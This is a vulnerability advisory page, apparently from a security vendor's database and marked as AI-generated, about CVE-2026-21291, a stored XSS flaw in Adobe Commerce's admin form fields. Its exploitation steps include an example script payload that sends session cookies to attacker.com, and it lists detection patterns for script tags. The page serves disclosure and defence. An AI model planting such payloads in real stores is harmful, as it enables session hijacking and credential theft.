CVE-2026-21291
Adobe Commerce vulnerability analysis and mitigation

Overview

CVE-2026-21291 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce and Magento Open Source that allows a high-privileged attacker to inject malicious scripts into vulnerable form fields. Affected versions include Adobe Commerce 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier, as well as corresponding Adobe Commerce B2B releases. Exploitation requires user interaction — a victim must browse to the page containing the compromised field. The vulnerability was disclosed on March 10–11, 2026, with a CVSS v3.1 base score of 4.8 (Medium) (Adobe Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically the stored (persistent) variant. A high-privileged attacker (e.g., an administrator) can inject malicious JavaScript into form fields within the Adobe Commerce admin panel; the payload is persisted server-side and later rendered unsanitized in the browser of any user who visits the affected page. The attack vector is network-based, requires no special complexity, but does require high privileges and user interaction from a victim to trigger script execution (Adobe Advisory).

Impact

When exploited, the injected script executes in the browser context of any user — including other administrators — who views the page containing the malicious field, potentially enabling session hijacking, credential theft, or unauthorized administrative actions. Because the payload persists in the application, it can affect multiple victims over time without repeated attacker interaction. Confidentiality and integrity are both impacted at a low level (limited data exposure and limited content manipulation), while availability is not directly affected (Adobe Advisory).

Exploitation steps

  1. Gain Admin Access: Obtain high-privileged (administrator) credentials to the Adobe Commerce admin panel through phishing, credential stuffing, or other means.
  2. Identify Vulnerable Form Fields: Navigate to admin-facing form fields within the Commerce backend (e.g., product descriptions, CMS page content, or custom attribute fields) that are rendered without proper output encoding.
  3. Inject Malicious Payload: Enter a stored XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable field and save the form.
  4. Wait for Victim Interaction: The payload is now persisted in the database. When another user (e.g., a store administrator or customer) browses to the page rendering the compromised field, the script executes in their browser.
  5. Harvest Results: The attacker receives stolen session cookies, credentials, or other sensitive data, potentially enabling account takeover or further lateral movement within the Commerce environment (Adobe Advisory).

Indicators of compromise

  • Logs: Admin audit logs showing unexpected modifications to form fields (e.g., product descriptions, CMS blocks, or custom attributes) containing <script>, javascript:, or encoded variants such as %3Cscript%3E.
  • Network: Outbound HTTP requests from victim browsers to unknown external domains shortly after loading admin or storefront pages; unusual GET/POST requests to attacker-controlled URLs containing cookie or session data.
  • File System: No direct file-system artifacts expected for a stored XSS; however, database records in cms_block, catalog_product_entity_text, or similar tables may contain injected script tags.
  • Process/Browser: Unexpected JavaScript execution errors or redirects observed in browser developer console when loading specific admin or storefront pages.

Mitigation and workarounds

Adobe has released patched versions addressing this vulnerability as documented in security bulletin APSB26-05. Organizations should upgrade to the following fixed releases or later: Adobe Commerce 2.4.4-p17, 2.4.5-p16, 2.4.6-p14, 2.4.7-p9, 2.4.8-p4, or 2.4.9 (GA), and corresponding Magento Open Source and Commerce B2B versions. As an interim measure, restrict administrative form field access to the minimum number of trusted administrators and monitor admin activity logs for suspicious changes to content fields (Adobe Advisory).

Community reactions

The CIS (Center for Internet Security) published an advisory noting multiple vulnerabilities in Adobe products patched in the March 2026 update cycle, including this stored XSS. Coverage was also noted on threat intelligence aggregators such as BeyondMachines and VulDB shortly after disclosure. No significant researcher commentary or social media discussion beyond routine CVE tracking has been identified for this specific vulnerability.

Additional resources


SourceThis report was generated using AI

Related Adobe Commerce vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-48358CRITICAL10
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48356CRITICAL9.6
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48000MEDIUM6.1
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48371MEDIUM5.4
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48001LOW3.7
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management